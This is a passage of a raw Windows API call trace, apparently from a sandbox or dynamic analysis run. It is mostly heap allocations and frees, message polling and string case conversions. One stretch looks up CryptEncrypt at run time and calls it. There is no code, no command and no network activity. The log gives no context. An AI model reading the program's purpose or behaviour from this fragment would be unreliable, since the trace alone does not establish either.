wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0255.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0255.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0255.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0255.998] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0255.998] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0255.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0255.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0255.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0255.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0255.998] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0255.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0255.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f78 [0255.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0255.998] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0255.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0255.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0255.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0255.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.999] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0255.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0255.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0255.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0255.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0255.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0255.999] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0255.999] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0256.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0256.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0256.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0256.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0256.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0256.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0256.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24db688 | out: hHeap=0x25c0000) returned 1 [0256.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0256.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0256.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.003] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0256.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0256.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0256.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0256.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0256.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0256.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0256.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0256.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0256.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0256.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24aa230, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0256.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0256.005] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0256.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0256.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0256.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0256.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0256.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0256.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0256.006] CryptEncrypt (in: hKey=0xaa59a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x695b, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x6960) returned 1 [0256.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0256.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0256.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0256.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0256.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0256.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0256.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0256.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0256.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0256.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0256.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0256.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0256.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0256.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0256.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0256.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0256.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0256.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0256.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0256.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0256.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0256.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0256.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0256.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0256.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0256.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0256.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0256.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0256.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0256.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0256.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0256.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0256.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0256.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0256.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0256.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0256.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0256.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0256.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0256.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0256.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0256.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0256.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0256.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0256.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0256.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0256.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.010] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0256.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0256.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0256.010] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.010] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0256.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 